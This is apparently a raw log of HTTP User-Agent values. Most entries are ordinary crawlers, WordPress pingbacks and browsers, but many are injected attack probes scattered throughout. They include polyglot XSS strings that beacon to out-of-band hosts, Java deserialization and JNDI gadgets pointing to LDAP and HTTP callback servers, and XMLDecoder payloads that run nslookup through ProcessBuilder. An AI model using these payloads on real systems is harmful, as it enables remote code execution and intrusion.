/\/wjj14djznu48un80mopy3zj6pxv1ypqgeb11pq\.b.inty.io/).replace(/\\/g,[]))//'> +Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) kafe/1533015580-0 +WordPress/4.5.14; http://pokazyrowerowe.eu +WordPress/4.5.14; http://goldblog.eu +WordPress/4.5.14; http://petice.eu +Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) kafe/1530716939-0 +Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) kafe/1527683652-0 +Checklinks/1.3 (Dispenserbot; http://dispenser.info.tm/~dispenser/view/Checklinks) +Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) kafe/1535733959-0 +Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) kafe/1527090341-0 +Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) kafe/1524745318-0 +javascript:/*</script><svg/onload=' /"/ /onmouseover=1/ /[*/[]/ ((new(Image)).src=([] /\/rniw88nurp83yicvqjtt7un1tszs4gw7k27svh\.b.inty.io/).replace(/\\/g,[]))//'> +Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) kafe/1530484768-0 +WordPress/4.7.7; http://www.bancosdeportugal.info +javascript:/*</script><svg/onload=' /"/ /onmouseover=1/ /[*/[]/ ((new(Image)).src=([] /\/npgg8vl3ca1t24ovun7meyji39965uxllg86wv\.b.inty.io/).replace(/\\/g,[]))//'> +javascript:/*</script><svg/onload=' /"/ /onmouseover=1/ /[*/[]/ ((new(Image)).src=([] /\/i9snuz9ldguuk9ymcafktl9sfjlnlbd21xoncc\.b.inty.io/).replace(/\\/g,[]))//'> +python-requests/2.6.0 CPython/2.7.14 Linux/4.14.47-64.38.amzn2.x86_64 +(compatible; Googlebot-Mobile/2.1; http://www.google.com/bot.html) +Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; QQDownload 718; InfoPath.2; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E) +javascript:/*</script><svg/onload=' /"/ /onmouseover=1/ /[*/[]/ ((new(Image)).src=([] /\/xqr2beq0uvb91of1tpwza0q7wy23zrrifd23qs\.b.inty.io/).replace(/\\/g,[]))//'> +MetaInspector/5.5.0 ( https://github.com/jaimeiniesta/metainspector) +Mozilla/5.0 (X11; U; Linux x86_64; de-DE; rv:1.9.0.19) Gecko/2010120923 ThumbShotsBot (KFSW 3.0.6-3) +javascript:/*</script><svg/onload=' /"/ /onmouseover=1/ /[*/[]/ ((new(Image)).src=([] /\/rvqkezr7ie7x88uz0rdqk2pm9df46syjme94xt\.b.inty.io/).replace(/\\/g,[]))//'> +javascript:/*</script><svg/onload=' /"/ /onmouseover=1/ /[*/[]/ ((new(Image)).src=([] /\/9blewqbcf7wlm00de1hbvcbjhan9qxio6jt9hy\.b.inty.io/).replace(/\\/g,[]))//'> +WhatsApp/2.17.334 W +javascript:/*</script><svg/onload=' /"/ /onmouseover=1/ /[*/[]/ ((new(Image)).src=([] /\/sokl70k8bf0y19n0ts6rd3in2e8h25uwir5ht6\.b.inty.io/).replace(/\\/g,[]))//'> +Python/3.6 aiohttp/1.3.1 +WhatsApp/2.17.304 W +WhatsApp/2.17.306 W +WordPress/4.9.5; https://emprestimofacil.net +rogerbot/1.2 (https://moz.com/help/guides/moz-procedures/what-is-rogerbot, rogerbot-crawler aardwolf-production-crawler-74@moz.com) +javascript:/*</script><svg/onload=' /"/ /onmouseover=1/ /[*/[]/ ((new(Image)).src=([] /\/7muc7omaq57jxybbpzs96amhs8y13pvgjb61uq\.b.inty.io/).replace(/\\/g,[]))//'> +UCWEB/2.0 (Java; U; MIDP-2.0; Nokia203/20.37) U2/1.0.0 UCMini/11.0.6.1040 (SpeedMode; Proxy; Android 4.4.2; ASUS_Z007 ) U2/1.0.0 Mobile +WordPress/4.9.5; https://creditos-portugal.com +javascript:/*</script><svg/onload=' /"/ /onmouseover=1/ /[*/[]/ ((new(Image)).src=([] /\/krfpc1rnvicw2bgoucxmbnruxl3prhi5ds3gs\.b.inty.io/).replace(/\\/g,[]))//'> +WordPress/4.9; http://cast-in.pt +Python/3.6 aiohttp/2.3.7 +rogerbot/1.2 (https://moz.com/help/guides/moz-procedures/what-is-rogerbot, rogerbot-crawler aardwolf-crawl-production-crawler-24@moz.com) +["java.util.HashSet",[["org.springframework.aop.support.DefaultBeanFactoryPointcutAdvisor",{"beanFactory":["org.springframework.jndi.support.SimpleJndiBeanFactory",{"shareableResources":["ldap://k0lb3qqhnt1o7lq1tse0m4dsijodt5hu.b.inty.io/"]}],"adviceBeanName":"ldap://k0lb3qqhnt1o7lq1tse0m4dsijodt5hu.b.inty.io/"}],["org.springframework.aop.support.DefaultBeanFactoryPointcutAdvisor",{}]]] +GuzzleHttp/6.2.1 curl/7.56.0 PHP/7.1.11 +Mozilla/5.0 (compatible; MarketwireBot/1.0; +http://www.marketwire.com) +Mozilla/5.0 (Linux; Android 6.0.1; Moto G (4) Build/MPJ24.139-64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.81 Mobile Safari/537.36 PTST/171115.221131 +WhatsApp/2.18.145 A +WordPress/4.9.5; http://blog.ptisp.pt +UCWEB/2.0 (Java; U; MIDP-2.0; Nokia203/20.37) U2/1.0.0 UCMini/10.7.8.806 (SpeedMode; Proxy; Android 5.1.1; SM-G531H ) U2/1.0.0 Mobile +WordPress/4.9.5; http://www.nvalores.pt +Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) kafe/1534183484-0 +WordPress/4.9.4; http://localhost/prova_sito +WhatsApp/2.18.62 A +Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) kafe/1536091223-0 +javascript:/*</script><svg/onload=' /"/ /onmouseover=1/ /[*/[]/ ((new(Image)).src=([] /\/fq9kbwqiudbr16fjt7whaiqpwg296xyomj99xy\.b.inty.io/).replace(/\\/g,[]))//'> +Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; QQDownload 718; .NET CLR 2.0.50727; GreenBrowser) +javascript:/*</script><svg/onload=' /"/ /onmouseover=1/ /[*/[]/ ((new(Image)).src=([] /\/ei0j3vihmc3qt57il6og2hioofuez2rtfo2eq3\.b.inty.io/).replace(/\\/g,[]))//'> +python-requests/2.7.0 CPython/2.7.15 Linux/4.16.0-kali2-amd64 +WordPress/4.9.2; http://localhost/prova_sito +Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) kafe/1533024282-0 +WhatsApp/2.18.262 A +javascript:/*</script><svg/onload=' /"/ /onmouseover=1/ /[*/[]/ ((new(Image)).src=([] /\/og8hzwc43bsut5fwloyn5zajua0brzjq7lubi0\.b.inty.io/).replace(/\\/g,[]))//'> +javascript:/*</script><svg/onload=' /"/ /onmouseover=1/ /[*/[]/ ((new(Image)).src=([] /\/ixjnizxl1giu89mm0a3khlxs3j9dz1rsfn2dq2\.b.inty.io/).replace(/\\/g,[]))//'> +Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) kafe/1525695637-0 +javascript:/*</script><svg/onload=' /"/ /onmouseover=1/ /[*/[]/ ((new(Image)).src=([] /\/aguf1rgdk81mr15ej2mc0dgkmbsgg87w2js7h\.b.inty.io/).replace(/\\/g,[]))//'> +javascript:/*</script><svg/onload=' /"/ /onmouseover=1/ /[*/[]/ ((new(Image)).src=([] /\/4x29ilx712ig8vm80w36h7xe3595bt3krfe52u\.b.inty.io/).replace(/\\/g,[]))//'> +rogerbot/1.2 (https://moz.com/help/guides/moz-procedures/what-is-rogerbot, rogerbot-crawler aardwolf-crawl-production-crawler-53@moz.com) +Mozilla/5.0 (Linux; Android 6.0.1; Moto G (4) Build/MPJ24.139-64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.81 Mobile Safari/537.36 PTST/171114.181126 +Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) kafe/1529960490-0 +rogerbot/1.2 (https://moz.com/help/guides/moz-procedures/what-is-rogerbot, rogerbot-crawler aardwolf-production-crawler-05@moz.com) +javascript:/*</script><svg/onload=' /"/ /onmouseover=1/ /[*/[]/ ((new(Image)).src=([] /\/i0jnlz0l4glub9pm3a6kkl0s6jco8c03oybozd\.b.inty.io/).replace(/\\/g,[]))//'> +Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) kafe/1530897731-0 +Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) kafe/1534167070-0 +javascript:/*</script><svg/onload=' /"/ /onmouseover=1/ /[*/[]/ ((new(Image)).src=([] /\/wxx1idxz1ui88nm00o3yhzx63x9vej6au5hv5k\.b.inty.io/).replace(/\\/g,[]))//'> +Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) kafe/1533069746-0 +Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) kafe/1529605044-0 +Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) kafe/1524069895-0 +javascript:/*</script><svg/onload=' /"/ /onmouseover=1/ /[*/[]/ ((new(Image)).src=([] /\/o6vhpw24tbiuj55wboonvz0jkaqev2ntboyem3\.b.inty.io/).replace(/\\/g,[]))//'> +Mozilla/5.0 (Linux; Android 6.0.1; Moto G (4) Build/MPJ24.139-64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.111 Mobile Safari/537.36 PTST/180222.140239 +javascript:/*</script><svg/onload=' /"/ /onmouseover=1/ /[*/[]/ ((new(Image)).src=([] /\/lmbe5ti198yrz2ltrl4kbwgg076y5mxdl88ywn\.b.inty.io/).replace(/\\/g,[]))//'> +javascript:/*</script><svg/onload=' /"/ /onmouseover=1/ /[*/[]/ ((new(Image)).src=([] /\/nc3sx4cqglxzne1rffipwqcxioolh990xvkl8a\.b.inty.io/).replace(/\\/g,[]))//'> +NewsGator FetchLinks extension/0.2.0 (http://graemef.com) +javascript:/*</script><svg/onload=' /"/ /onmouseover=1/ /[*/[]/ ((new(Image)).src=([] /\/xij8lp0skgudekojqspnqu3a71dt6hy8m39txi\.b.inty.io/).replace(/\\/g,[]))//'> +WordPress/4.5.14; http://parsecnl.eu +python-requests/2.6.0 CPython/2.7.5 Linux/3.10.0-327.36.3.el7.centos.plus.x86_64 +javascript:/*</script><svg/onload=' /"/ /onmouseover=1/ /[*/[]/ ((new(Image)).src=([] /\/axbl02f5zt9qtx3w554057inmesbg37r2es2h\.b.inty.io/).replace(/\\/g,[]))//'> +Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) kafe/1524708213-0 +Hatena::Fetcher/0.01 (master) Furl/3.13 +HatenaBookmark/4.0 (Hatena::Bookmark; Analyzer) +W3C_Validator/1.767 +COMODO SSL Checker +Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) kafe/1529605159-0 +Mozilla/5.0 (compatible; WebCorp/5.0; http://www.webcorp.org.uk) +javascript:/*</script><svg/onload=' /"/ /onmouseover=1/ /[*/[]/ ((new(Image)).src=([] /\/gqalbxqjuebs17fkt8wiajqqwh2bxzpqdl0bo0\.b.inty.io/).replace(/\\/g,[]))//'> +python-requests/2.7.0 CPython/2.7.6 Linux/3.19.0-80-generic +RobotsChecker/0.6 ( http://www.blocked.org.uk) +WhatsApp/2.18.129 A +WordPress/4.9.3; http://bestdownloadwarezarchive.biz +WordPress/4.2.18; http://ipdal.org +Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; QQDownload 718; .NET4.0C; .NET4.0E; InfoPath.3) +Apache-HttpClient/4.5.2 (Java/1.7.0_45) +WhatsApp/2.18.259 A +javascript:/*</script><svg/onload=' /"/ /onmouseover=1/ /[*/[]/ ((new(Image)).src=([] /\/lnce6tj1a8zr02mtsl5kcwhg17777vzmnha7yw\.b.inty.io/).replace(/\\/g,[]))//'> +Jersey/2.26 (HttpUrlConnection 1.8.0_171) +Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) kafe/1530897732-0 +Apache-HttpClient/4.5.5 (Java/1.8.0_181) +javascript:/*</script><svg/onload=' /"/ /onmouseover=1/ /[*/[]/ ((new(Image)).src=([] /\/am0f7rmdq87mx1bep2sc6dmksby8xwpndi08ox\.b.inty.io/).replace(/\\/g,[]))//'> +Mozilla/5.0 (compatible; UptimeRobot/2.0; http://www.uptimerobot.com/) +javascript:/*</script><svg/onload=' /"/ /onmouseover=1/ /[*/[]/ ((new(Image)).src=([] /\/mc2fvu82z9osp3buhmul1x6hq8w6yuqleg16pv\.b.inty.io/).replace(/\\/g,[]))//'> +WordPress/4.9.1; https://www.lisbonguru.com +<?xml version="1.0" encoding="UTF-8"?><java version="1.8.0_40" class="java.beans.XMLDecoder"><new class="java.lang.ProcessBuilder"><string>nslookup</string><string>gi27lm8d5pjkph8xboww40vo0f676y2mr.b.inty.io</string><method name="start" /></new></java> +rogerbot/1.2 (https://moz.com/help/guides/moz-procedures/what-is-rogerbot, rogerbot-crawler aardwolf-production-crawler-40@moz.com) +javascript:/*</script><svg/onload=' /"/ /onmouseover=1/ /[*/[]/ ((new(Image)).src=([] /\/easjvvahecvql5zid6gguhaogfmcm0er2mpcd1\.b.inty.io/).replace(/\\/g,[]))//'> +FreeWebMonitoring SiteChecker/0.1 (+http://www.freewebmonitoring.com) +WordPress/4.8.4; http://www.boramorarfora.com.br +Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) kafe/1534157824-0 +javascript:/*</script><svg/onload=' /"/ /onmouseover=1/ /[*/[]/ ((new(Image)).src=([] /\/k7sps17nbiswibwoacdmrn7udljk7cy0tnjb8\.b.inty.io/).replace(/\\/g,[]))//'> +Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) kafe/1530805935-0 +javascript:/*</script><svg/onload=' /"/ /onmouseover=1/ /[*/[]/ ((new(Image)).src=([] /\/2gj71jg5k01ert56jum405gcm3s4sskj8ev4jt\.b.inty.io/).replace(/\\/g,[]))//'> +Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) kafe/1524069894-0 +WordPress/4.7.9; http://www.camaraportuguesa-rj.com.br +WordPress/4.7.8; http://www.factis.com +Mozilla/5.0 SeznamEmailProxy/2.0.180 +Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; QQDownload 734; .NET CLR 2.0.50727; SE 2.X MetaSr 1.0) +Mozilla/5.0 (Linux; Android 6.0.1; Moto G (4) Build/MPJ24.139-64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.111 Mobile Safari/537.36 PTST/180125.200147 +Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; QQDownload 718; GTB7.4; .NET CLR 2.0.50727; KB974489) +javascript:/*</script><svg/onload=' /"/ /onmouseover=1/ /[*/[]/ ((new(Image)).src=([] /\/h8qarp4xv4knly7pdhqgxs2cm3s2xqphdc02or\.b.inty.io/).replace(/\\/g,[]))//'> +Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; QQDownload 718; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; InfoPath.2) +!!javax.management.BadAttributeValueExpException [!!org.apache.xbean.naming.context.ContextUtil$ReadOnlyBinding ["foo", !!javax.naming.Reference [foo, "Freddy", "http://6t0xwcj3gfua07jnme7mfq6eb5hwmwdk2.b.inty.io/"], !!org.apache.xbean.naming.context.WritableContext []]] +W3CLineMode/5.4.0 libwww/5.x.x +javascript:/*</script><svg/onload=' /"/ /onmouseover=1/ /[*/[]/ ((new(Image)).src=([] /\/r4w27jmm6ag70eadcmbhcop4tvzo1ct3hy4osd\.b.inty.io/).replace(/\\/g,[]))//'> +WhatsApp/2.18.67 A +javascript:/*</script><svg/onload=' /"/ /onmouseover=1/ /[*/[]/ ((new(Image)).src=([] /\/v2yo71g4e2ajzqbzrwf34f8h3893xvojj69uy\.bcs.integrity.pt/).replace(/\\/g,[]))//'> +Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) kafe/1531839278-0 +WordPress/4.9.1; http://softart.com.ua +javascript:/*</script><svg/onload=' /"/ /onmouseover=1/ /[*/[]/ ((new(Image)).src=([] /\/x1zqk5xdokd3ee056xjwq8vsfjle960uvhl5a\.b.inty.io/).replace(/\\/g,[]))//'> +Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) kafe/1528886892-0 +Mozilla/5.0 (Linux; Android 6.0.1; Moto G (4) Build/MPJ24.139-64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.146 Mobile Safari/537.36 PTST/180711.180745 +javascript:/*</script><svg/onload=' /"/ /onmouseover=1/ /[*/[]/ ((new(Image)).src=([] /\/ttqyeatwxre54kixwlzvdwt3zu5v3jvaj56vuk\.b.inty.io/).replace(/\\/g,[]))//'> +Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; QQDownload 718; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E) +WordPress/4.9.5; https://economiafinancas.com +Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) kafe/1524745327-0 +Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; znwb7400; QQDownload 718; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; {D9D54F49-E51C-445e-92F2-1EE3C2313240}; .NET4.0C; .NET4.0E) +Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) kafe/1523888281-0 +Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; QQDownload 734; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729) +WordPress/4.9.1; http://www.atlaslisboa.com +Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.87 Safari/537.36 PTST/180613.140635 +Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) kafe/1523640405-0 +Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; QQDownload 732; .NET CLR 2.0.50727) +javascript:/*</script><svg/onload=' /"/ /onmouseover=1/ /[*/[]/ ((new(Image)).src=([] /\/dr86alnte03j4uqlwd9cgol85zb01otfha40sp\.b.inty.io/).replace(/\\/g,[]))//'> +Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) kafe/1523640752-0 +javascript:/*</script><svg/onload=' /"/ /onmouseover=1/ /[*/[]/ ((new(Image)).src=([] /\/6mtb7nm9q47ixxbapys869mgs7y3vrnibdy3ms\.b.inty.io/).replace(/\\/g,[]))//'> +Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) kafe/1531154524-0 +Mozilla/5.0 SeznamEmailProxy/2.0.179 +javascript:/*</script><svg/onload=' /"/ /onmouseover=1/ /[*/[]/ ((new(Image)).src=([] /\/vzy0kczy3tk7amoz2n5xjyz55wbz7nzen9azyo\.b.inty.io/).replace(/\\/g,[]))//'> +Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; QQDownload 718) +Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) kafe/1524331734-0 +Mozilla/4.0 (compatible; GoogleToolbar 7.5.8231.2252; Windows 6.3; MSIE 9.11.9600.18817) +Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) kafe/1532963654-0 +Mozilla/5.0 (compatible; heritrix/3.3.0-SNAPSHOT-20161014-0013 http://www.oszk.hu) +Iframely/1.0.4 ( http://iframely.com/;) +javascript:/*</script><svg/onload=' /"/ /onmouseover=1/ /[*/[]/ ((new(Image)).src=([] /\/2gj71jg5k01ert56jum405gcm3s3prhi5ds3gs\.b.inty.io/).replace(/\\/g,[]))//'> +Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; QQDownload 718; InfoPath.3; SE 2.X MetaSr 1.0) +Mozilla/5.0 (Linux; Android 6.0.1; Moto G (4) Build/MPJ24.139-64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.111 Mobile Safari/537.36 PTST/180201.200217 +Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) kafe/1535990408-0 +WordPress/4.5.13; http://eroeroero.biz +Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) kafe/1534167072-0 +javascript:/*</script><svg/onload=' /"/ /onmouseover=1/ /[*/[]/ ((new(Image)).src=([] /\/jtgccrpzg65p60sryjbiiune75dw3qrii6dt3hs\.b.inty.io/).replace(/\\/g,[]))//'> +MetaInspector/4.4.1 ( https://github.com/jaimeiniesta/metainspector) +Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; QQDownload 718; Shuame; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E) +Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; GTB7.1; QQDownload 734; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; AskTbFXTV5/5.11.3.15590; .NET4.0C) +Mozilla/5.0 (Linux; Android 6.0.1; Moto G (4) Build/MPJ24.139-64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.81 Mobile Safari/537.36 PTST/171222.191253 +Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) kafe/1529906520-0 +javascript:/*</script><svg/onload=' /"/ /onmouseover=1/ /[*/[]/ ((new(Image)).src=([] /\/1wyuf9shjo879iv911e0lcqwangk981zpuck09\.b.inty.io/).replace(/\\/g,[]))//'> +Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) kafe/1535033371-0 +Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) kafe/1536321856-0 +Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) kafe/1533821975-0 +WhatsApp/2.18.159 A +WordPress/4.9.8; http://www.bancosdeportugal.info +Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) kafe/1529967118-0 +WordPress/4.5.15; http://ss770.info +WordPress/4.9.5; https://dicasdelisboa.com +Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) kafe/1531909430-0 +Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.108 Safari/537.36 PTST/171213.181240 +NetSurf/1.1 (Linux; i686) +set: ? !!org.apache.commons.configuration.ConfigurationMap [!!org.apache.commons.configuration.JNDIConfiguration [!!javax.naming.InitialContext [], "ldap://wiinl28t55j0px8db4wc4gv40v6p7o5cu.b.inty.io/"]] +WhatsApp/2.17.401 A +!!javax.script.ScriptEngineManager [!!java.net.URLClassLoader [[!!java.net.URL ["http://dl24ojba8mmhsebuelzt7xyl3c93e2iq7.b.inty.io/"]]]] +Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko GomezAgent 3.0) Chrome/56.0.2924.87 Safari/537.36 +javascript:/*</script><svg/onload=' /"/ /onmouseover=1/ /[*/[]/ ((new(Image)).src=([] /\/xqr8tp8ssg2dmkwjysxnyubaf1lv9n0bvylma\.b.inty.io/).replace(/\\/g,[]))//'> +Microsoft-WebDAV-MiniRedir/10.0.10586 +WhatsApp/2.18.48 A +WordPress/4.9.4; http://www.museugraovasco.pt +WordPress/4.5.14; http://miranbr.biz +AppEngine-Google; ( http://code.google.com/appengine; appid: s~fanpagekarma) +Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) kafe/1528660698-0 +javascript:/*</script><svg/onload=' /"/ /onmouseover=1/ /[*/[]/ ((new(Image)).src=([] /\/gtd9copwg35m6xsoygbfirnb72d03ovfja60up\.b.inty.io/).replace(/\\/g,[]))//'> +Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) kafe/1536164917-0 +Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) kafe/1536159316-0 +WhatsApp/2.18.199 A +javascript:/*</script><svg/onload=' /"/ /onmouseover=1/ /[*/[]/ ((new(Image)).src=([] /\/0hit08dg4nt6uhg8m0zz6bbvvm1l19t0hv4lsa\.b.inty.io/).replace(/\\/g,[]))//'> +Python/3.4 aiohttp/2.1.0 +GoogleEarth/7.3.2.5491(Windows;Microsoft Windows (6.2.9200.0);de;kml:2.2;client:Pro;type:default) +Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Trident/4.0; QQDownload 769; .NET CLR 2.0.50727) +Mozilla/5.0 (Linux; Android 6.0.1; Moto G (4) Build/MPJ24.139-64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.111 Mobile Safari/537.36 PTST/180215.170220 +Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) kafe/1529605174-0 +Mozilla/5.0 (iPad; CPU OS 5_0 like Mac OS X) AppleWebKit/537.36 (KHTML, like Gecko; Google Web Preview) Version/5.1 Mobile/9A334 Safari/7534.48.3 +javascript:/*</script><svg/onload=' /"/ /onmouseover=1/ /[*/[]/ ((new(Image)).src=([] /\/7hpc2ohal52jsy6bkzn91ahhn8t8nwfn3iq8ex\.b.inty.io/).replace(/\\/g,[]))//'> +Mozilla/5.0 SeznamEmailProxy/2.0.189 +javascript:/*</script><svg/onload=' /"/ /onmouseover=1/ /[*/[]/ ((new(Image)).src=([] /\/sd9xy9dvhqy4oj2wgkjuxvd2jtpsogg742rsfh\.b.inty.io/).replace(/\\/g,[]))//'> +WhatsApp/2.18.164 W +javascript:/*</script><svg/onload=' /"/ /onmouseover=1/ /[*/[]/ ((new(Image)).src=([] /\/bdsgysdeh9yno22fg3jdxedljcpdq1is6ntdh2\.b.inty.io/).replace(/\\/g,[]))//'> +javascript:/*</script><svg/onload=' /"/ /onmouseover=1/ /[*/[]/ ((new(Image)).src=([] /\/hn8a6pjxa4zn0ympsh5gcshc137v1jtah54vsk\.b.inty.io/).replace(/\\/g,[]))//'> +NokiaC3-00/5.0 (08.70) Profile/MIDP-2.1 Configuration/CLDC-1.1 UCWEB/2.0 (Java; U; MIDP-2.0; pt-BR; nokiac3-00) U2/1.0.0 UCBrowser/8.9.0.251 U2/1.0.0 Mobile UNTRUSTED/1.0 +WordPress/4.9.4; https://www.eurodicas.com.br +WordPress/4.9.5; https://matchplace.com +<?xml version="1.0" encoding="UTF-8"?><java version="1.8.0_40" class="java.beans.XMLDecoder"><new class="java.lang.ProcessBuilder"><string>nslookup</string><string>wffni25t25g0mx5d84tc1gs4xv3o2otci.b.inty.io</string><method name="start" /></new></java> +Mozilla/5.0 (Linux; Android 6.0.1; Moto G (4) Build/MPJ24.139-64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.81 Mobile Safari/537.36 PTST/171211.191218 +javascript:/*</script><svg/onload=' /"/ /onmouseover=1/ /[*/[]/ ((new(Image)).src=([] /\/isebxo6r4p06pd1mhj5qu2y4tvzxnped90zoo\.bcs.integrity.pt/).replace(/\\/g,[]))//'> +UCWEB/2.0 (Java; U; MIDP-2.0; Nokia203/20.37) U2/1.0.0 UCMini/11.0.0.1016 (SpeedMode; Proxy; Android 5.0.2; vivo_Y51L ) U2/1.0.0 Mobile +Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) kafe/1523631797-0 +WhatsApp/2.18.60.15 CFNetwork/897.15 Darwin/17.5.0 +Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) kafe/1528025004-0 +Python/3.6 aiohttp/3.4.4 +Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) kafe/1529605026-0 +Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) kafe/1535733958-0 +WhatsApp/2.17.258 W +WhatsApp/2.18.71.6 CFNetwork/902.2 Darwin/17.7.0 +Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) kafe/1529605192-0 +javascript:/*</script><svg/onload=' /"/ /onmouseover=1/ /[*/[]/ ((new(Image)).src=([] 